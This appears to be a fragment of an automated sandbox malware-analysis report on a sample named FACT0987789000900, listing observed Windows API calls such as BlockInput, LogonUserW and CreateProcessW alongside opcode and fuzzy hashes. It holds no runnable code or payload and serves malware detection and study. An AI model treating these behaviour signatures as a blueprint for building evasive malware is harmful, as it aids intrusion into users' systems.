                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlockInput
                                                                                                                • String ID:
                                                                                                                • API String ID: 3456056419-0
                                                                                                                • Opcode ID: b2bd48a48047dcbc96a113a24416073cce962de07c8329505b346afa2816b074
                                                                                                                • Instruction ID: 22d508d16b9c69fd4eb48294c244d732bd4123b368d38f9892de43ca5b687302
                                                                                                                • Opcode Fuzzy Hash: b2bd48a48047dcbc96a113a24416073cce962de07c8329505b346afa2816b074
                                                                                                                • Instruction Fuzzy Hash: A2E012356002046FC700EF5AD404996B7ECAFB57A5F05C47BE945D7251DAB4E8049BA4
                                                                                                                APIs
                                                                                                                • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 004D750A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: mouse_event
                                                                                                                • String ID:
                                                                                                                • API String ID: 2434400541-0
                                                                                                                • Opcode ID: 51a76873fa091ae97c5a4dd3715b627db77013817cc8305ccf2245a130a583e0
                                                                                                                • Instruction ID: 492f3e949ed63c0c1541ddd022dac610524212f42764a0997695fa9f8e09628b
                                                                                                                • Opcode Fuzzy Hash: 51a76873fa091ae97c5a4dd3715b627db77013817cc8305ccf2245a130a583e0
                                                                                                                • Instruction Fuzzy Hash: 74D09EA426C61579EC1A0B24AC3BFB75509F300782FD4454B7603D97C1F8DC6D06A03A
                                                                                                                APIs
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 004FF649
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DialogNtdllProc_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3239928679-0
                                                                                                                • Opcode ID: 493113d1596d9ddb1fffd88b4fbcaa32cd2d6614fc09edd3f09f403cafaa0b51
                                                                                                                • Instruction ID: f7806dbb1cc7e5cd5481951ccb061ecc8c2b6b2f551eea25ab1d790305119b6f
                                                                                                                • Opcode Fuzzy Hash: 493113d1596d9ddb1fffd88b4fbcaa32cd2d6614fc09edd3f09f403cafaa0b51
                                                                                                                • Instruction Fuzzy Hash: D5F06D31241348BFDB21DF58DC15FD67FA9EB15720F044009BA21AB2E1CB746824EB68
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 004AAB7D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DialogLongNtdllProc_Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2065330234-0
                                                                                                                • Opcode ID: cc0555d39f18d9fd141eebaa38728d9d7455b50e1ef979cf7da87630bd0847dd
                                                                                                                • Instruction ID: f1551dcf6d1524640ae7800f1472f553bf048627a91d5fc57d87fca94d499afb
                                                                                                                • Opcode Fuzzy Hash: cc0555d39f18d9fd141eebaa38728d9d7455b50e1ef979cf7da87630bd0847dd
                                                                                                                • Instruction Fuzzy Hash: 1DE08C30100204FBCF04AF91CC11F683F2AEB69315F108009BA050A2A2CB37A422EB58
                                                                                                                APIs
                                                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,004CAD3E), ref: 004CB124
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LogonUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1244722697-0
                                                                                                                • Opcode ID: c5b6ef51558fa54fd722021fc82b8f84ecbcdc3e7d229506f52ee5d7b56f9a98
                                                                                                                • Instruction ID: 07ee1507bc354856bc4f7049d140b535635eefd85d3f1f7041a1fbe2089e8155
                                                                                                                • Opcode Fuzzy Hash: c5b6ef51558fa54fd722021fc82b8f84ecbcdc3e7d229506f52ee5d7b56f9a98
                                                                                                                • Instruction Fuzzy Hash: 5BD05E320A460EAEDF028FA4DC06EAE3F6AEB04700F408110FA11C50A0C672D531EB60
                                                                                                                APIs
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0050E4D1,?,?,?,?,?,?), ref: 004FF67F
                                                                                                                  • Part of subcall function 004FE32E: _memset.LIBCMT ref: 004FE33D
                                                                                                                  • Part of subcall function 004FE32E: _memset.LIBCMT ref: 004FE34C
                                                                                                                  • Part of subcall function 004FE32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00553D00,00553D44), ref: 004FE37B
                                                                                                                  • Part of subcall function 004FE32E: CloseHandle.KERNEL32 ref: 004FE38D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                • String ID:
                                                                                                                • API String ID: 2364484715-0
                                                                                                                • Opcode ID: 8e2777fade3271a64d72aab4fa95be7047236b64dc868e7bc137c63012cd7f97
                                                                                                                • Instruction ID: eec38dbfb054975b6eee7640b006a3acec9764011515ac57e018a053de606725
                                                                                                                • Opcode Fuzzy Hash: 8e2777fade3271a64d72aab4fa95be7047236b64dc868e7bc137c63012cd7f97
                                                                                                                • Instruction Fuzzy Hash: CDE04632100208EFCB01DF05DC49EA63BB6EF18315F02401AFA00472B2CB31AC65EF59
                                                                                                                APIs
                                                                                                                • NtdllDialogWndProc_W.NTDLL ref: 004FF5FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DialogNtdllProc_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3239928679-0
                                                                                                                • Opcode ID: a885ddadef2fe81b84f075056c86c8f56eb3ce48266bddc8339e9ac25e8457e2
                                                                                                                • Instruction ID: 677cd14f077bd3e6dd1eba70712d23758c63200861395ae7fa97c6325919e239
                                                                                                                • Opcode Fuzzy Hash: a885ddadef2fe81b84f075056c86c8f56eb3ce48266bddc8339e9ac25e8457e2
                                                                                                                • Instruction Fuzzy Hash: 87E0E234200208EFCB01DF84D844E863BA6EB29310F014054FD044B262CB72A864EBA1
                                                                                                                APIs
                                                                                                                • NtdllDialogWndProc_W.NTDLL ref: 004FF5D0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DialogNtdllProc_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3239928679-0
                                                                                                                • Opcode ID: fdc97087b600f794d3f8c5918b3f8465900f50cb3a9fbe3a659e09f177953937
                                                                                                                • Instruction ID: c60aa7838250ddef5490319c20b92db534792dd121714b31a89d8a22679c9089
                                                                                                                • Opcode Fuzzy Hash: fdc97087b600f794d3f8c5918b3f8465900f50cb3a9fbe3a659e09f177953937
                                                                                                                • Instruction Fuzzy Hash: F5E0E234204208AFCB01DF84DC44E863BA6EB29310F014054FD044B261CB72A820EB61
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                  • Part of subcall function 004AB73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004AB72B), ref: 004AB7F6
                                                                                                                  • Part of subcall function 004AB73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,004AB72B,00000000,?,?,004AB2EF,?,?), ref: 004AB88D
                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,004AB2EF,?,?), ref: 004AB734
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2797419724-0
                                                                                                                • Opcode ID: ba79fd424419c1b50bb87e268d8ac2f2776c7fa07aff67c6e240f4db3c79cc63
                                                                                                                • Instruction ID: 6fac9090cae86790f432a6d72a8b708d0de179cf3071d5b4e2c63638bca56555
                                                                                                                • Opcode Fuzzy Hash: ba79fd424419c1b50bb87e268d8ac2f2776c7fa07aff67c6e240f4db3c79cc63
                                                                                                                • Instruction Fuzzy Hash: ECD0123014030C77DB102B91DD07F893E5FDB61755F408026BA042D1D2CBB6541095AC
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NameUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2645101109-0
                                                                                                                • Opcode ID: 242c30aa77e4ffca5f43d574afe6a658d26671c9bd83013f1f108d7ae6c0abcb
                                                                                                                • Instruction ID: 388a02c41f1fbde509ff68327b93d720d41f2488830320fc55be9e3c3abf0571
                                                                                                                • Opcode Fuzzy Hash: 242c30aa77e4ffca5f43d574afe6a658d26671c9bd83013f1f108d7ae6c0abcb
                                                                                                                • Instruction Fuzzy Hash: 88C04CB1400109DFD751CBC0C9489EEB7BCBB08301F104091E105F1150D7709B459B72
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 004B818F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: d09a04a7d8c1b5d64d057212a24926035ca22f44a309cd6a3dc6e71cac7aeaa0
                                                                                                                • Instruction ID: 5a823d97b3ce972943d388514976379f6b7aa6760c0e02e0a1f4ef29755f7467
                                                                                                                • Opcode Fuzzy Hash: d09a04a7d8c1b5d64d057212a24926035ca22f44a309cd6a3dc6e71cac7aeaa0
                                                                                                                • Instruction Fuzzy Hash: 0DA0223000020CFBCF002F82FC088C8BF3CFB002A0B008020F80C00030CB33A820AAE2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a72ad53606576e13fef61fa7a0cf2558cdab99aac98f1e27b5ebcf01b8c2fc56
                                                                                                                • Instruction ID: 26cc016c5c2eaa4ad4369816d22b172a40c522c32f7da140b1bfd1be5ff3d6c8
                                                                                                                • Opcode Fuzzy Hash: a72ad53606576e13fef61fa7a0cf2558cdab99aac98f1e27b5ebcf01b8c2fc56
                                                                                                                • Instruction Fuzzy Hash: 6E127F70A002099FDF04DFA9D985AEEBBB5FF58304F10452EE406E7290EB39AD15CB59
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67c26263ec99fb1d9172a3b9a3923ae6d96a10731de84fa3bac139a8ed2d1ce8
                                                                                                                • Instruction ID: 35faa3e57d1687603323355489b054cd235df27d89dadc4424f80b13a09431a2
                                                                                                                • Opcode Fuzzy Hash: 67c26263ec99fb1d9172a3b9a3923ae6d96a10731de84fa3bac139a8ed2d1ce8
                                                                                                                • Instruction Fuzzy Hash: 2F129E74904205DFDF24DF96C480AAEBBB0FF18314F14807AD9469B351E739AD86CB9A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 3728558374-0
                                                                                                                • Opcode ID: 5f614df76539a7fdba3a9d9a5372a325e49cc78eff6acff0b4eb007d0a9e326b
                                                                                                                • Instruction ID: d02a78d02d5dfc97e1adddec1148b972384c76618a693ff7af64fc49689c58d5
                                                                                                                • Opcode Fuzzy Hash: 5f614df76539a7fdba3a9d9a5372a325e49cc78eff6acff0b4eb007d0a9e326b
                                                                                                                • Instruction Fuzzy Hash: 6702F370A00209DFCF04DF69D991AAEBBB5FF49304F10807AE806DB295EB39D915CB95
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                • Instruction ID: ebd2eed5ccfeecaab9d6971258c8304cdbd301443d7158f7de7fbbb198fbb741
                                                                                                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                • Instruction Fuzzy Hash: 60C1B4322051930ADF6D4639843447FBBA15AA27F231A176FD8B3CB6D5EF28C528D634
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                • Instruction ID: 3f1ad976feb87232c1d48fb44eaef6788856ec2d9793da938a10b8e4868e541a
                                                                                                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
